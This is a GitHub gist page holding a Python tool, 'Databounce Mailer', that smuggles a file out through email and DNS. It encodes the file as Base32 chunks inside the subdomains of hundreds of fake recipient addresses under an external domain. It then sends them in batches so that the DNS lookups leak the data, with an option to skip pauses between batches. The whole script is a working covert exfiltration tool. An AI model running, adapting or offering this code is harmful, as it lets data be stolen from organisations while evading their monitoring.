Skip to content

Instantly share code, notes, and snippets.

@yosignals
Created November 14, 2024 14:27
Show Gist options
  • Save yosignals/dce98eea85f8032afa0106e6ad6ad95e to your computer and use it in GitHub Desktop.
Save yosignals/dce98eea85f8032afa0106e6ad6ad95e to your computer and use it in GitHub Desktop.
Databounce Mailer - 500 'recipients per email'
import argparse
import base64
import os
import smtplib
import time
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

import dns.resolver
# Configuration
# Requested size of each raw data chunk in bytes.
# NOTE(review): 63 raw bytes Base32-encode to 104 characters, which is longer
# than the 63-character limit of a single DNS label.
CHUNK_SIZE = 63
# Maximum number of recipient addresses placed in one message.
RECIPIENTS_PER_EMAIL = 500
# Default delay in seconds between sending batches.
FREQUENCY_DELAY = 10
# Change to 465 if using SSL.
SMTP_PORT = 587
# Credentials can be supplied through the SMTP_USER / SMTP_PASSWORD
# environment variables so real secrets do not have to be written into this
# file; the placeholders below are used when the variables are not set.
SMTP_USER = os.environ.get('SMTP_USER', '[email protected]')
SMTP_PASSWORD = os.environ.get('SMTP_PASSWORD', 'your_password')
# Set to True if your server uses SSL on port 465.
USE_SSL = False
def encode_file_in_base32_chunks(filepath, chunk_size=None, max_label_len=40):
    """Read a file and return its contents as a list of unpadded Base32 strings.

    The file is split into fixed-size byte chunks and each chunk is Base32
    encoded with the trailing ``=`` padding removed.  The number of raw bytes
    per chunk is capped so that every encoded string fits within
    ``max_label_len`` characters.  Nothing is truncated, so decoding the
    chunks in order (after restoring padding) reproduces the file exactly.

    Args:
        filepath: Path of the file to read; it is opened in binary mode.
        chunk_size: Requested number of raw bytes per chunk.  Defaults to the
            module-level ``CHUNK_SIZE``.  The effective size is the smaller of
            this value and what fits in ``max_label_len`` characters.
        max_label_len: Maximum length, in characters, of each encoded chunk.

    Returns:
        A list of Base32 strings without padding; empty for an empty file.

    Raises:
        ValueError: If ``chunk_size`` is smaller than 1 or ``max_label_len``
            is too small to hold a single encoded byte.
    """
    if chunk_size is None:
        chunk_size = CHUNK_SIZE
    if chunk_size < 1:
        raise ValueError("chunk_size must be at least 1 byte")

    # Unpadded Base32 needs ceil(8 * n / 5) characters for n bytes, so the
    # largest n that fits in max_label_len characters is floor(5 * len / 8).
    max_raw_bytes = max_label_len * 5 // 8
    if max_raw_bytes < 1:
        raise ValueError("max_label_len is too small to hold any encoded data")
    step = min(chunk_size, max_raw_bytes)

    with open(filepath, 'rb') as file:
        data = file.read()

    return [
        base64.b32encode(data[offset:offset + step]).decode('ascii').rstrip('=')
        for offset in range(0, len(data), step)
    ]
def format_email_address(chunk_number, total_chunks, encoded_chunk, external_domain):
    """Build the ``boop@...`` address that carries one encoded chunk.

    The host part is ``<chunk_number>of<total_chunks>.<encoded_chunk>.<external_domain>``.

    Raises:
        ValueError: If any dot-separated label of the host is longer than 63
            characters, or the whole host is longer than 253 characters.
    """
    sequence_label = f"{chunk_number}of{total_chunks}"
    host = f"{sequence_label}.{encoded_chunk}.{external_domain}"

    # Validate against the DNS limits: 63 characters per label, 253 overall.
    longest_label = max(len(part) for part in host.split('.'))
    if longest_label > 63 or len(host) > 253:
        raise ValueError(f"DNS label or domain too long: {host}")

    return "boop@" + host
def prepare_recipients(encoded_chunks, external_domain):
    """Return one recipient address per encoded chunk, in input order.

    Chunks are numbered from 1, and each address also records the total
    number of chunks.  Address construction and length validation are
    delegated to ``format_email_address``.
    """
    chunk_count = len(encoded_chunks)
    addresses = []
    for position, chunk in enumerate(encoded_chunks, start=1):
        addresses.append(
            format_email_address(position, chunk_count, chunk, external_domain)
        )
    return addresses
def resolve_full_subdomain(full_subdomain):
    """Look up the A record of ``full_subdomain`` and report whether it resolved.

    A fresh resolver pointed at Google's public DNS servers (8.8.8.8 and
    8.8.4.4) with caching disabled is used for every call.  The outcome is
    printed, and every failure (NXDOMAIN, no answer, or any other error) is
    reported as ``False`` rather than raised.

    Returns:
        True if the lookup succeeded, False otherwise.
    """
    resolved = False
    try:
        lookup = dns.resolver.Resolver(configure=False)
        lookup.nameservers = ['8.8.8.8', '8.8.4.4']  # Google's public DNS servers
        lookup.cache = None  # no caching, so every call performs a fresh lookup
        lookup.resolve(full_subdomain, 'A')
        print(f"Subdomain {full_subdomain} resolved successfully.")
        resolved = True
    except dns.resolver.NXDOMAIN:
        print(f"Subdomain {full_subdomain} does not exist.")
    except dns.resolver.NoAnswer:
        print(f"No answer for subdomain {full_subdomain}.")
    except Exception as err:
        print(f"Failed to resolve {full_subdomain}: {err}")
    return resolved
def send_emails_in_batches(recipients, smtp_server, aggressive, delay):
    """Send one message per batch of recipients through ``smtp_server``.

    Recipients are split into groups of at most ``RECIPIENTS_PER_EMAIL``.
    Within each group only addresses whose domain resolves (checked with
    ``resolve_full_subdomain``) are kept.  If any remain, a single message
    is sent to all of them.

    Args:
        recipients: List of e-mail addresses of the form ``local@domain``.
        smtp_server: Host name of the SMTP server to connect to.
        aggressive: When true, do not pause between batches.
        delay: Seconds to sleep between batches when not ``aggressive``.

    Returns:
        None.  Progress is printed for every batch that is sent.
    """
    if not recipients:
        # Nothing to send: do not open an SMTP connection at all.
        return

    batches = [
        recipients[start:start + RECIPIENTS_PER_EMAIL]
        for start in range(0, len(recipients), RECIPIENTS_PER_EMAIL)
    ]
    total_batches = len(batches)

    smtp_class = smtplib.SMTP_SSL if USE_SSL else smtplib.SMTP
    with smtp_class(smtp_server, SMTP_PORT) as server:
        if not USE_SSL and SMTP_PORT == 587:
            server.starttls()  # Use TLS only if not SSL and port 587
        # Authentication is disabled by default; enable the next line if the
        # server requires a login.
        # server.login(SMTP_USER, SMTP_PASSWORD)

        for batch_num, batch in enumerate(batches, start=1):
            # Only keep addresses whose full subdomain resolves.
            batch_recipients = [
                recipient for recipient in batch
                if resolve_full_subdomain(recipient.split('@', 1)[1])
            ]

            if batch_recipients:
                msg = MIMEMultipart()
                msg['From'] = SMTP_USER
                msg['Subject'] = "Data Transmission"
                # Assigning msg['To'] repeatedly appends a new header each
                # time; a message may carry only one To field, so list every
                # recipient in a single header.
                msg['To'] = ', '.join(batch_recipients)
                msg.attach(MIMEText("Placeholder text - actual data attached in email address"))
                server.sendmail(SMTP_USER, batch_recipients, msg.as_string())
                print(f"Batch {batch_num}/{total_batches} sent to {len(batch_recipients)} recipients.")

            # Pause between batches only; there is nothing to wait for after
            # the final one.
            if not aggressive and batch_num < total_batches:
                time.sleep(delay)
def send_encoded_file(filepath, external_domain, aggressive=False, delay=FREQUENCY_DELAY):
    """Encode ``filepath`` into recipient addresses and mail them in batches.

    The SMTP host is ``smtp.`` followed by everything after the first dot of
    ``external_domain``; an ``external_domain`` without a dot raises
    ``IndexError``.  The file is encoded with
    ``encode_file_in_base32_chunks``, turned into addresses with
    ``prepare_recipients``, and handed to ``send_emails_in_batches``.

    Args:
        filepath: Path of the file to send.
        external_domain: Domain appended to every recipient address.
        aggressive: When true, batches are sent without a pause in between.
        delay: Seconds to wait between batches when not ``aggressive``.
    """
    # Drop the first label of the domain to find the mail server's domain.
    parent_domain = external_domain.split('.', 1)[1]
    smtp_server = "smtp." + parent_domain

    recipients = prepare_recipients(
        encode_file_in_base32_chunks(filepath),
        external_domain,
    )
    print(f"Prepared {len(recipients)} recipient addresses.")

    send_emails_in_batches(recipients, smtp_server, aggressive=aggressive, delay=delay)
def _non_negative_seconds(text):
    """argparse ``type`` callable: parse ``text`` as a finite delay >= 0 seconds.

    Rejecting bad values here reports them as a normal usage error instead of
    letting ``time.sleep`` raise part-way through a run.
    """
    try:
        seconds = float(text)
    except ValueError:
        raise argparse.ArgumentTypeError(f"invalid delay value: {text!r}") from None
    # The chained comparison is also false for NaN, so NaN is rejected too.
    if not 0 <= seconds < float('inf'):
        raise argparse.ArgumentTypeError(
            f"delay must be a finite, non-negative number of seconds: {text!r}"
        )
    return seconds


if __name__ == '__main__':
    # Command-line entry point: parse the arguments and hand off to
    # send_encoded_file.
    parser = argparse.ArgumentParser(description="Send a file as encoded data chunks via email.")
    parser.add_argument('filepath', type=str, help="Path to the file to be sent.")
    parser.add_argument('external_domain', type=str, help="External domain to use in the recipient email addresses.")
    parser.add_argument('--aggressive', action='store_true', help="Send emails without delay between batches.")
    parser.add_argument('--delay', type=_non_negative_seconds, default=FREQUENCY_DELAY, help="Delay in seconds between email batches.")
    args = parser.parse_args()
    send_encoded_file(args.filepath, args.external_domain, aggressive=args.aggressive, delay=args.delay)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment